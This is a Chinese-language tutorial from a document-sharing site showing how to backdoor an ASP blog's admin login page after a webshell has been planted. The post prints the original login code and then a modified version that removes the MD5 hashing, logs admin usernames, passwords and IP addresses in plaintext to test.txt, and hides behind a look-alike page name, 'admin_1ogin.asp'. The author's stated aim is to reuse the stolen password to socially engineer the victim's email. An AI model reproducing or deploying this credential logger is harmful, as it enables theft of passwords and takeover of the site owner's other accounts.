如何截取asp后台登陆密码的代码
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
如何截取asp后台登陆密码的代码
在一次安全检测中,其实已拿到了webshell了,但是我还要社工他的邮箱还有其他资料类,所以要得知道他的习性。
下载了数据库,但是md5密码没办法解密。
唉,看来只要记录他的登录管理员账号密码了!
省得还要去穷取法破解!
这个密码其实说重要也不重要说不重要其实很重要。
因为很多人喜欢使用相同密码。
即使是我这类安全检测人员,也免不了使用同一种账号密码的习惯。
首先看看他的后台登陆代码
<%
Dim Login
Set Login=new AdLogin
Login.Execute
Class AdLogin
Private ExCommCls
Private Sub class_initialize
Set CommCls=new CommonCls
ExCommCls.IsIpAllow
ExCommCls.CheckInstall
ExCommCls.GetConfigCache("*")
End Sub
Private Sub class_terminate
Set ExCommCls=nothing
End Sub
public Sub Execute
Dim Action
Action=Request("action")
Select Case Action
Case "CheckLogin"
CheckLogin
Case "LoginOut"
LoginOut
Case Else
LoginF
End Select
End Sub
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
If Trim(CheckCode)<>session("excheckcode") and
Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"admin_login.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"admin_inde x.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误
",Application(sn&"blogurl")&"admin_login.asp"
End if
End Sub
Private Sub LoginOut
Response.Cookies(Md5(SN))("AdName")=""
Response.Cookies(Md5(SN))("AdPwd")=""
session.Abandon()
ExCommCls.ShowMsg "成功退出登陆",Application(sn&"blogurl")&"index.asp"
End Sub
Private Sub LoginF
%>
看下列代码
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=md5(Trim(request("AdPwd")))
---意思很简单,这里就不明说了,主要看md5 ,密码使用md5加密这样的话,我们记录的密码也就没用了,还是md5。
所以所以想到了,一个钓鱼手法。
它本来的登录界面是
Private Sub CheckLogin
Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff
AdName=ExCommCls.G(Trim(request("Adname")))
AdPwd=(Trim(request("AdPwd")))
CheckCode=ExCommCls.G(request("checkCode"))
strLogFile="test.txt"
IP=request("IP")
StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP& ("REMOTE_HOST")
set f=Server.CreateObject("scripting.filesystemobject")
set
ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(chr(13)+chr(10)&StrLogText)
ff.close
set ff=nothing
set f=nothing
If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then
ExCommCls.ShowMsg "验证码错误!",Application(sn&"blogurl")&"Admin_1ogin.asp"
Exit Sub
End If
If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then
Response.Cookies(Md5(SN))("AdName")=AdName
Response.Cookies((SN))("AdPwd")=AdPwd
session("AdLogin")=Md5(SN)
ExCommCls.GetConfigCache("*")
ExCommCls.GetClassCache()
Response.Redirect(Application(sn&"blogurl")&"Admin_1ogi n.asp")
Else
ExCommCls.ShowMsg "帐号或密码错误",Application(sn&"blogurl")&"Admin_1ogin.asp"
End if
End Sub
看到没,
a=本来的登录页面现在换成了钓鱼页面
b=本来的登录页面(admin_login.asp)修改成admin_1ogin.asp 为什么呢。
本来的:AdPwd=md5(Trim(request("AdPwd")))
Response.Cookies(Md5(SN))("AdPwd")=AdPwd
修改
AdPwd=(Trim(request("AdPwd")))
Response.Cookies((SN))("AdPwd")=AdPwd
去掉md5。
这样的迷惑手法,使用很久了!。
没什么技术含量。
还请不要见笑!密码会记录在test.txt上更多信息请查看IT技术专栏。